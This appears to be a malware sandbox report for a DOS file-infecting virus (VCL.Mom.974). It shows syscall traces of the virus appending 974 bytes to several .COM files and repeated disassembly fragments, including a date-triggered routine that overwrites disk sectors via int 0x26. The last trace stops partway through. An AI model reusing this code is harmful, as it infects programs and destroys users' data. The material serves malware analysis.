Sample viewer

vx.netlux.org/Virus.DOS.VCL.Mom.974

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:06:20.084342305Z 26 PC: 12cc6 | Set disk transfer address
2018-12-17T23:06:20.086050839Z 71 PC: 12a97 | Get current directory
2018-12-17T23:06:20.090452695Z 78 PC: 12b01 | Find first file
2018-12-17T23:06:20.097521659Z 78 PC: 12b01 | Find first file
2018-12-17T23:06:20.104587269Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:06:20.11600781Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:06:20.133448287Z 62 PC: 12b20 | Close file
2018-12-17T23:06:20.135551033Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.154889793Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:06:20.162833594Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T23:06:20.166436779Z 66 PC: 12cc1 | Move file pointer
2018-12-17T23:06:20.169135697Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-17T23:06:20.17292779Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-17T23:06:20.183328747Z 87 PC: 12c25 | Get or set file date and time
2018-12-17T23:06:20.185665829Z 62 PC: 12c29 | Close file
2018-12-17T23:06:20.195421051Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.207128322Z 79 PC: 12b01 | Find next file
2018-12-17T23:06:20.210706227Z 61 PC: 12ccf | Open file (Filename = 'PRINT.COM')
2018-12-17T23:06:20.217969075Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:06:20.224882429Z 62 PC: 12b20 | Close file
2018-12-17T23:06:20.226853282Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.252520238Z 61 PC: 12ccf | Open file (Filename = 'PRINT.COM')
2018-12-17T23:06:20.261123521Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T23:06:20.264219622Z 66 PC: 12cc1 | Move file pointer
2018-12-17T23:06:20.26648019Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-17T23:06:20.269523498Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-17T23:06:20.279759493Z 87 PC: 12c25 | Get or set file date and time
2018-12-17T23:06:20.282659972Z 62 PC: 12c29 | Close file
2018-12-17T23:06:20.291690766Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.302874395Z 79 PC: 12b01 | Find next file
2018-12-17T23:06:20.306485008Z 61 PC: 12ccf | Open file (Filename = 'HELLO.COM')
2018-12-17T23:06:20.313706473Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:06:20.320749892Z 62 PC: 12b20 | Close file
2018-12-17T23:06:20.322988888Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.336627482Z 61 PC: 12ccf | Open file (Filename = 'HELLO.COM')
2018-12-17T23:06:20.342029018Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T23:06:20.344937828Z 66 PC: 12cc1 | Move file pointer
2018-12-17T23:06:20.34636512Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-17T23:06:20.34903675Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-17T23:06:20.358559464Z 87 PC: 12c25 | Get or set file date and time
2018-12-17T23:06:20.361090902Z 62 PC: 12c29 | Close file
2018-12-17T23:06:20.370269655Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.381789877Z 79 PC: 12b01 | Find next file
2018-12-17T23:06:20.391453896Z 61 PC: 12ccf | Open file (Filename = 'PHANG.COM')
2018-12-17T23:06:20.399638835Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:06:20.406709525Z 62 PC: 12b20 | Close file
2018-12-17T23:06:20.409407645Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.420110882Z 61 PC: 12ccf | Open file (Filename = 'PHANG.COM')
2018-12-17T23:06:20.427310502Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T23:06:20.431098792Z 66 PC: 12cc1 | Move file pointer
2018-12-17T23:06:20.432789048Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-17T23:06:20.435965236Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-17T23:06:20.446254007Z 87 PC: 12c25 | Get or set file date and time
2018-12-17T23:06:20.448715744Z 62 PC: 12c29 | Close file
2018-12-17T23:06:20.457147135Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.476702792Z 79 PC: 12b01 | Find next file
2018-12-17T23:06:20.480119588Z 61 PC: 12ccf | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:06:20.487578977Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-17T23:06:20.494788731Z 62 PC: 12b20 | Close file
2018-12-17T23:06:20.497613845Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.502801162Z 61 PC: 12ccf | Open file (Filename = 'PRINTA~1.COM�')
2018-12-17T23:06:20.508458369Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 2)
2018-12-17T23:06:20.513482905Z 66 PC: 12cc1 | Move file pointer
2018-12-17T23:06:20.515881039Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-17T23:06:20.519205686Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 2)
2018-12-17T23:06:20.552271851Z 87 PC: 12c25 | Get or set file date and time
2018-12-17T23:06:20.554305907Z 62 PC: 12c29 | Close file
2018-12-17T23:06:20.55590473Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.559330415Z 79 PC: 12b01 | Find next file
2018-12-17T23:06:20.561445234Z 61 PC: 12ccf | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:06:20.566050308Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 2)
2018-12-17T23:06:20.571269426Z 62 PC: 12b20 | Close file
2018-12-17T23:06:20.5733317Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.584290149Z 61 PC: 12ccf | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:06:20.592587067Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 2)
2018-12-17T23:06:20.595703537Z 66 PC: 12cc1 | Move file pointer
2018-12-17T23:06:20.597100872Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-17T23:06:20.599774051Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 2)
2018-12-17T23:06:20.609955149Z 87 PC: 12c25 | Get or set file date and time
2018-12-17T23:06:20.611601316Z 62 PC: 12c29 | Close file
2018-12-17T23:06:20.620217703Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.631217206Z 79 PC: 12b01 | Find next file
2018-12-17T23:06:20.633451873Z 61 PC: 12ccf | Open file (Filename = 'PAH.COM')
2018-12-17T23:06:20.638148054Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 2)
2018-12-17T23:06:20.643288368Z 62 PC: 12b20 | Close file
2018-12-17T23:06:20.644883488Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.65213501Z 61 PC: 12ccf | Open file (Filename = 'PAH.COM')
2018-12-17T23:06:20.657305529Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 2)
2018-12-17T23:06:20.659636407Z 66 PC: 12cc1 | Move file pointer
2018-12-17T23:06:20.661764923Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-17T23:06:20.668702329Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 2)
2018-12-17T23:06:20.675022056Z 87 PC: 12c25 | Get or set file date and time
2018-12-17T23:06:20.676528059Z 62 PC: 12c29 | Close file
2018-12-17T23:06:20.682239462Z 67 PC: 12cda | Get or set file attributes
2018-12-17T23:06:20.6899608Z 79 PC: 12b01 | Find next file
2018-12-17T23:06:20.692007172Z 61 PC: 12ccf | Open file (Filename = 'TEST.COM')
2018-12-17T23:06:20.696384739Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 2)
2018-12-17T23:06:20.699060222Z 62 PC: 12b20 | Close file
2018-12-17T23:06:20.70056896Z 79 PC: 12b01 | Find next file
2018-12-17T23:06:20.702485644Z 59 PC: 12aad | Change current directory
2018-12-17T23:06:20.715544569Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-17T23:06:20.720060873Z 59 PC: 12aba | Change current directory
2018-12-17T23:06:20.72167255Z 26 PC: 12cc6 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:36.621597344Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:36.623217951Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:36.626508345Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:36.633618714Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:36.640039041Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:36.647534711Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:36.654252051Z 62 PC: 12b20 | Close file
2018-12-25T12:43:36.656320369Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:36.676295879Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.684296524Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:36.687692096Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:36.690121977Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:36.696318597Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:36.702255449Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:36.703788527Z 62 PC: 12c29 | Close file
2018-12-25T12:43:36.712478147Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.723109541Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:36.726210524Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.752863666Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:36.760608271Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:36.763252788Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.775624399Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.79751367Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:36.801102076Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:36.803818321Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:36.807177787Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:36.817205737Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:36.820188812Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:36.829678786Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.840930993Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:36.844929854Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.853088045Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:36.861132789Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:36.86438097Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.876481658Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.884707912Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:36.888105288Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:36.891081505Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:36.895061837Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:36.905801989Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:36.908646053Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:36.918317279Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.929584094Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:36.933407997Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.941008125Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:36.94855522Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:36.951689287Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.964207845Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.972074504Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:36.977269211Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:36.979774259Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:36.983148529Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:36.993461507Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:36.997039671Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.005893981Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.016764439Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.021317897Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.026017758Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.033635069Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.036832806Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.042752382Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.045890786Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.048379747Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.049586427Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.052642896Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.068856237Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.071412331Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.073885753Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.079087156Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.082526982Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.091318751Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.095766404Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.097957711Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.108556139Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.116929831Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.122198858Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.124526197Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.12889692Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.141491672Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.143515362Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.152973694Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.166200577Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.169850851Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.193057682Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.201888104Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.204170416Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.215608745Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.223377438Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.228112744Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.230160034Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.233470821Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.244822011Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.246756628Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.255454516Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.267588616Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.271353419Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.279106932Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.283211288Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.286039225Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.289193738Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:37.294208998Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:37.297711582Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:37.299567864Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:36.822328495Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:36.824914638Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:36.828500793Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:36.835354404Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:36.843318659Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:36.851835795Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:36.859267078Z 62 PC: 12b20 | Close file
2018-12-25T12:43:36.862182952Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:36.882836062Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.904548566Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:36.912024195Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:36.91378345Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:36.916611274Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:36.927071314Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:36.928931534Z 62 PC: 12c29 | Close file
2018-12-25T12:43:36.93747686Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.949005747Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:36.953068821Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.96074581Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:36.968783781Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:36.97195051Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.983437908Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.99128285Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:36.996006306Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:36.997999511Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.001346111Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.012911229Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.01873713Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.027607839Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.040051064Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.043118236Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.051011025Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.058211552Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.060967486Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.072735882Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.081651368Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.086260583Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.088204904Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.09144188Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.108071431Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.1105116Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.119423332Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.131993731Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.135504575Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.162997674Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.170947661Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.173546083Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.185085644Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.19295047Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.197625181Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.199578765Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.202900343Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.214196747Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.216295299Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.225700745Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.237640595Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.240643958Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.247894391Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.256049903Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.258875651Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.264201525Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.275635644Z 64 PC: 12bf9 | Write file or device (See above)
